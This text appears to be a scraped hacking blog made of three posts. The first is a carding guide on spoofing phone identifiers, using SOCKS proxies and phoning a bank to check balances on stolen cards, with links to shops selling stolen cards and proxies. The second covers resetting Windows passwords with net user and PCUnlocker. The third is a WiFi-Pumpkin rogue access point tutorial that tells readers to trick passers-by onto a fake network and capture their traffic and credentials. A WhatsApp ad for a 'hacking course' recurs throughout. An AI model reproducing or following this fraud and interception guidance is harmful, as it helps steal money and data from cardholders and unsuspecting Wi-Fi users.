Well, I won’t suggest to do it with Mobile or Android Smartphone, Either You can Try. I personally Suggest using a PC for it. ????


1. A Rooted Android Device with Some Apps Installed, Apps Like- IMEI Changer, CCleaner, Android ID Changer, Proxy Droid, and Phone ID Changer.

2. Change IMEI, Android ID and Phone ID Using Apps.

3. Connect SOCKS Proxy Using Proxy Droid App.

4. Now Follow All the Steps of Carding Mentioned Above. ????


List Of Sites for Carding?

Well, There is no one Site which can’t be Carded, Its All Depends on the Credit Card you have. It all depends on your methods and Active mind.


How to Check Balance on Credit Card?

Follow the Steps Mention Below, the Steps will only work with US and UK Based CC’s.


  • Check your BIN in www.binspro.com and get your bank name. For example of the BIN (430587), the bank is Capital One, USA.

  • Now search phone number bank in google. For this bank, it’s +1-800-935-9935

  • Call the number on Skype, it’s free since it’s toll-free number.

  • Now the automatic robot will ask you some info. Ex. CCN, CVV etc.

  • Now put your info by using your keyboard.

  • It will automatically tell you the CC balance.




Useful Links

Buy CC- www.validcc.su

Buy Socks- www.vip72.com

Download MAC Address Changer-Click

Download CCleaner- Click

Download Socks Checker- Click

Or 

Click










FOR HACKING COURSE

WHATSAPP:-  +16366780163

Monday, 28 May 2018

How to Change Windows Password without Knowing Old Password


Can't remember your Windows user password? As you all know without knowing the current password we are unable to change Windows password. Today I am going to tell you two easy tricks to change Windows password without knowing the old password. These tricks work on Windows 10, 8, 7, Vista and XP.



Option 1: Change Windows Password from Command Prompt


This is an especially handy trick if you want to change a password on an account but you've forgotten the old password (going through the Control Panel can require confirmation of the old password). You need to have admin access to perform this change from the command line.



1. Open an elevated Command Prompt. Click on Start button, go to All Programs -> Accessories and right click on Command Prompt and select "Run as Administrator" from context menu. In Windows 8, you can do this by simply pressing Windows Key + X + A.


2. You can use the net user command to change Windows password easily, without supplying the old password:

net user username  new_password

Replace username with your Windows account name, and new_password with your desired new password.




If you're totally locked out of Windows, you're unable to run any program such as command line tool to change your password. In this situation, you need to use a bootable media to change Windows password.





Option 2: Change Windows Password with PCUnlocker


PCUnlocker is a bootable utility that can reset the password of any Windows user account. It works with all versions of Windows, including Windows 10 and Windows Server 2012. Follow these steps and you can change Windows password without knowing the original password:


1. First of all, you need to use another PC to download the PCUnlocker program, which comes as a bootable CD image. Burn the ISO image to a blank CD or USB drive using the ISO2Disc utility.


2. Insert the newly burned CD or USB drive into your target computer, and set it to boot from CD/USB.


3. Once you've booted into the CD/USB drive, you'll be presented with the screen of PCUnlocker. This program automatically locates the SAM database file for your installed Windows operating system, and shows you a list of local user accounts.





4. Select a user account and click on
Reset Password button. It will remove your old password immediately. Restart the computer and you can then log into your Windows account without typing a password!





FOR HACKING COURSE:-

WHATSAPP :- +16366780163

Friday, 25 May 2018

Pumpkin Pi — The Rogue AP & MITM Framework That Fits in Your Pocket (Wi-Fi Hacking part 4)


WiFi-Pumpkin is a very complete framework for auditing Wi-Fi security. The main feature is the ability to create a fake AP and make Man In The Middle attack, but the list of features is quite broad.


A man-in-the-middle attack places you between your target and the internet, pretending to be a Wi-Fi network while secretly inspecting every packet that flows through the connection. The WiFi-Pumpkin is a rogue AP framework to easily create these fake networks, all while forwarding legitimate traffic to and from the unsuspecting target. Today, we'll learn to set up this framework on a low-cost Raspberry Pi running Kali Linux .


Download App :-  Tech Gyan Mantra


Man - in -the -Middle Pumpkin Pie

On the Raspberry Pi 3 running Kali Rolling, some Kali Linux tools can be broken out into standalone, almost disposable devices. One perfect example is the WiFi-Pumpkin , an attack framework for creating rogue access points to stage man-in-the-middle (MITM) attacks. This allows an attacker to lure victims to their evil access point and begin monitoring internet traffic, effectively seizing control over the flow of data to any connected victims.



A rouge device for creating fake Wi-Fi hotspots from a Raspberry Pi.


When to Use the WiFi Pumpkin


The WiFi-Pumpkin is a great tool to use when you have the ability to bridge an existing Ethernet or Wi-Fi connection, serving internet access to anyone willing to connect to an open network without asking too many questions. It comes stuffed with features, including rogue Wi-Fi access points, deauth attacks on client APs, a probe request and credentials monitor, transparent proxy, Windows update attack, phishing manager, ARP Poisoning, DNS Spoofing, Pumpkin-Proxy, and image capture on the fly.




Following up from a previous tutorial, wireless probe frames can reveal networks a phone or laptop is probing for. One way we can use the WiFi-Pumpkin is to monitor probe frames and create a network in response. We can use the WiFi-Pumpkin to conduct a "Karma" attack and create a network with the same SSID that the target device is expecting, or has connected to before.


The name of your network will have a huge effect on how people interact with it. If you are in a crowd, creating a network with names like "Starbucks" can cause a startling number of devices to connect to you in under a minute. Be creative in how you trick users into connecting to your evil AP. When you want fine control over the various elements of a man-in-the-middle attack, the WiFi-Pumpkin's easy GUI is straightforward enough for most beginners to grasp.


What You ' ll Need to Get Started


The setup to create a WiFi-Pumpkin is minimal and requires only a few components. To put this together, you'll need the following.

  • wireless network adapter
  • Ethernet cable
  • Raspberry Pi
  • microSD card
  • power source
  • USB keyboard/mouse interface
  • SD card adapter
  • laptop to load files on the SD card


This great kit from Canakit also has most of what you need.

A simple setup for a portable rouge AP, easy to hide or leave behind.



Installing & Running WiFi -Pumpkin ( Kali Linux )


As before any new install, ensure that your system is fully updated. WiFi-Pumpkin will require that you have an up-to-date Python installed on your machine.

sudo apt-get update

WiFi-Pumpkin has a number of dependencies you will need to have installed before it can run smoothly. Install the following if you don't already have them on your Kali-Pi.


STEP 1 : Install Dependencies

Python's package manager, Pip, will help us manage the rest of the installation. To install it on Kali Linux, run the following commands.

sudo apt-get install -y python-pip




The next three dependencies will allow WiFi-Pumpkin to verify certificates, add HTTP layer support, and intercept and inspect traffic flows. Install each as shown below.

pip install service_identity




pip install scapy_http



sudo apt-get install mitmproxy






STEP 2 : Install WiFi -Pumpkin


Download WiFi-Pumpkin by cloning the GitHub repository:





Then go inside the folder:

cd WiFi-Pumpkin

And change the permission of the installer file:

chmod +x installer.sh


And then run the installer by entering the following.

./installer.sh --install




STEP:- 3 Run WiFi - Pumpkin

When it's complete, run WiFi-Pumpkin by simply entering the following.


Sudo wifi-pumpkin



You're ready to get started creating fake APs!





Some Considerations with the WiFi - Pumpkin



Keep in mind, in order for WiFi-Pumpkin to work, you will need to have access to at least one Kali Linux compatible wireless adapter with AP/Monitor mode support. You will need your Pi to be connected to the internet while also capable of monitoring wireless traffic around you.


You can achieve this by using one wireless network adapter and your Pi's internal Wi-Fi card in tandem or a wired Ethernet connection and one wireless network adapter. In the case your particular Pi isn't Wi-Fi capable, you'll need two wireless network adapters. If you are unsure if the wireless adapter you have supports AP/Monitor mode, you can check in terminal with iw list . If there is an "AP" in the list of "Supported interface modes," then your device supports it.
If you're in need of a Kali Linux compatible wireless adapter with the appropriate functionality, check out link And, of course, happy hacking!






For Hacking course :-

Whatsapp :- +16366780163